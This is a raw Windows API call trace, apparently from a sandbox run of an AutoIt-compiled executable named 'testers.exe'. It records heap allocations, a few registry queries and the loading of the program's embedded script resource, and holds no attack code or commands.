[0071.050] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0071.050] GetNativeSystemInfo (in: lpSystemInfo=0x63f874 | out: lpSystemInfo=0x63f874*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0071.050] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.051] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6633b8 [0071.051] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633d0 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675ce8 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633e8 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675cf8 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663400 [0071.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675d08 [0071.052] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663418 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675d18 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663430 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675d28 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663448 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x675d38 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663460 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673718 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663478 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673728 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663490 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673738 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6634a8 [0071.052] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673748 [0071.052] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0071.052] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0071.052] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0071.052] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0071.052] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0071.052] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6634c0 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673758 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b18 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673768 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b30 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673778 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b48 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673788 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b60 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673798 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b78 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737a8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673b90 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737b8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673ba8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737c8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673bc0 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737d8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673bd8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737e8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6737f8 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673bf0 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673808 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c08 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673818 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c20 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673828 [0071.053] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c38 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673838 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c50 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673848 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673858 [0071.054] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc16b [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c68 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673868 [0071.054] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x662340 [0071.054] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0071.055] OleInitialize (pvReserved=0x0) returned 0x0 [0071.065] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673c80 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673888 [0071.065] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x63f87c | out: phkResult=0x63f87c*=0xf8) returned 0x0 [0071.065] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x63f898, lpcbData=0x63f880*=0x8 | out: lpType=0x0, lpData=0x63f898*=0x30, lpcbData=0x63f880*=0x4) returned 0x0 [0071.065] RegCloseKey (hKey=0xf8) returned 0x0 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676520 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673898 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738a8 [0071.065] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738b8 [0071.066] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673cb0 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738c8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676548 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738d8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673cc8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738e8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673ce0 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6738f8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673cf8 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673908 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d10 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673918 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d28 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673928 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d40 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673938 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d58 [0071.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673948 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d70 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673958 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673d88 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673968 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673da0 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673978 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673db8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673988 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673dd0 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673998 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673de8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739a8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e00 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739b8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e18 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739c8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e30 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739d8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e48 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739e8 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e60 [0071.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6739f8 [0071.067] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.068] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e78 [0071.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a08 [0071.071] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61f850, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe")) returned 0x31 [0071.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67a708 [0071.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a18 [0071.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x60f840, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x31 [0071.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673e78 | out: hHeap=0x650000) returned 1 [0071.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67a780 [0071.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a708 | out: hHeap=0x650000) returned 1 [0071.073] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a18 | out: hHeap=0x650000) returned 1 [0071.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x61f85c, lpFilePart=0x62f85c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x62f85c*="testers.exe") returned 0x31 [0071.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676570 [0071.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e78 [0071.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e90 [0071.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a18 [0071.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x62f878 | out: phkResult=0x62f878*=0x0) returned 0x2 [0071.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673e90 | out: hHeap=0x650000) returned 1 [0071.074] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a18 | out: hHeap=0x650000) returned 1 [0071.074] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.074] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.075] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673e90 [0071.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a18 [0071.075] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.075] IsThemeActive () returned 0x1 [0071.075] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x63f89c, fWinIni=0x0 | out: pvParam=0x63f89c) returned 1 [0071.075] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 0 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673ea8 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a28 [0071.076] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x62f870 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673ec0 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a38 [0071.076] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x60f7d0, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe")) returned 0x31 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67a708 [0071.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x5ff7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x31 [0071.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x663400 | out: hHeap=0x650000) returned 1 [0071.078] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67a7f8 [0071.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a708 | out: hHeap=0x650000) returned 1 [0071.078] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a48 | out: hHeap=0x650000) returned 1 [0071.078] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x662388 [0071.078] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.078] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.078] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0071.078] Wow64DisableWow64FsRedirection (in: OldValue=0x61f7d4 | out: OldValue=0x61f7d4*=0x0) returned 1 [0071.078] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.079] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x67a708 [0071.079] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x61f670, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.079] GetFileType (hFile=0xf8) returned 0x1 [0071.079] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x10000 [0071.080] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.080] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0071.080] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0071.080] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.080] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x67a870 [0071.080] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a58 [0071.080] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x61f830 | out: ppstm=0x61f830*=0x6765c0) returned 0x0 [0071.082] FindResourceExW (hModule=0x10000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0xd8528 [0071.082] LoadResource (hModule=0x10000, hResInfo=0xd8528) returned 0xe07b8 [0071.082] SizeofResource (hModule=0x10000, hResInfo=0xd8528) returned 0x93fa [0071.082] LockResource (hResData=0xe07b8) returned 0xe07b8 [0071.082] ISequentialStream:RemoteWrite (in: This=0x6765c0, pv=0xe07b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0071.083] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.083] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x67a870, cb=0x18, pcbRead=0x61f75c | out: pv=0x67a870*=0xa3, pcbRead=0x61f75c*=0x18) returned 0x0 [0071.083] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7a0, cb=0x4, pcbRead=0x61f75c | out: pv=0x61f7a0*=0x45, pcbRead=0x61f75c*=0x4) returned 0x0 [0071.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a58 | out: hHeap=0x650000) returned 1 [0071.083] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a870 | out: hHeap=0x650000) returned 1 [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7c4, cb=0x10, pcbRead=0x61f79c | out: pv=0x61f7c4*=0x4d, pcbRead=0x61f79c*=0x10) returned 0x0 [0071.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61f698 | out: lpSystemTimeAsFileTime=0x61f698*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.083] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.083] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f118, cb=0x4, pcbRead=0x61eedc | out: pv=0x61f118*=0x6b, pcbRead=0x61eedc*=0x4) returned 0x0 [0071.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61edd8 | out: lpSystemTimeAsFileTime=0x61edd8*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f120, cb=0x4, pcbRead=0x61eedc | out: pv=0x61f120*=0xa6, pcbRead=0x61eedc*=0x4) returned 0x0 [0071.083] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61ef08, cb=0x34, pcbRead=0x61eedc | out: pv=0x61ef08*=0xe1, pcbRead=0x61eedc*=0x34) returned 0x0 [0071.083] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61edd8 | out: lpSystemTimeAsFileTime=0x61edd8*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f120, cb=0x4, pcbRead=0x61eedc | out: pv=0x61f120*=0x17, pcbRead=0x61eedc*=0x4) returned 0x0 [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f14c, cb=0x6e, pcbRead=0x61eedc | out: pv=0x61f14c*=0xf9, pcbRead=0x61eedc*=0x6e) returned 0x0 [0071.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61edd8 | out: lpSystemTimeAsFileTime=0x61edd8*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7d3, cb=0x1, pcbRead=0x61f124 | out: pv=0x61f7d3*=0x0, pcbRead=0x61f124*=0x1) returned 0x0 [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7cc, cb=0x4, pcbRead=0x61f124 | out: pv=0x61f7cc*=0xbc, pcbRead=0x61f124*=0x4) returned 0x0 [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7cc, cb=0x4, pcbRead=0x61f124 | out: pv=0x61f7cc*=0xbc, pcbRead=0x61f124*=0x4) returned 0x0 [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x61f7cc, cb=0x4, pcbRead=0x61f124 | out: pv=0x61f7cc*=0x84, pcbRead=0x61f124*=0x4) returned 0x0 [0071.084] IStream:RemoteSeek (in: This=0x6765c0, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.084] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x673a58 [0071.084] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x673a68 [0071.084] ISequentialStream:RemoteRead (in: This=0x6765c0, pv=0x673a68, cb=0x0, pcbRead=0x61f124 | out: pv=0x673a68*=0x6e, pcbRead=0x61f124*=0x0) returned 0x0 [0071.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x61f020 | out: lpSystemTimeAsFileTime=0x61f020*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a58 | out: hHeap=0x650000) returned 1 [0071.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a68 | out: hHeap=0x650000) returned 1 [0071.084] CloseHandle (hObject=0xf8) returned 1 [0071.084] IUnknown:Release (This=0x6765c0) returned 0x0 [0071.084] FreeLibrary (hLibModule=0x10000) returned 1 [0071.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662388 | out: hHeap=0x650000) returned 1 [0071.084] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a48 | out: hHeap=0x650000) returned 1 [0071.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6633d0 | out: hHeap=0x650000) returned 1 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67a870 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633d0 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6765c0 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6765e8 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663400 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a68 [0071.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x663400 | out: hHeap=0x650000) returned 1 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676638 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x663400 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x673ed8 [0071.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6765c0 | out: hHeap=0x650000) returned 1 [0071.085] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a48 | out: hHeap=0x650000) returned 1 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a900 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a918 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a58 [0071.085] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x675220) returned 0x80 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6765c0 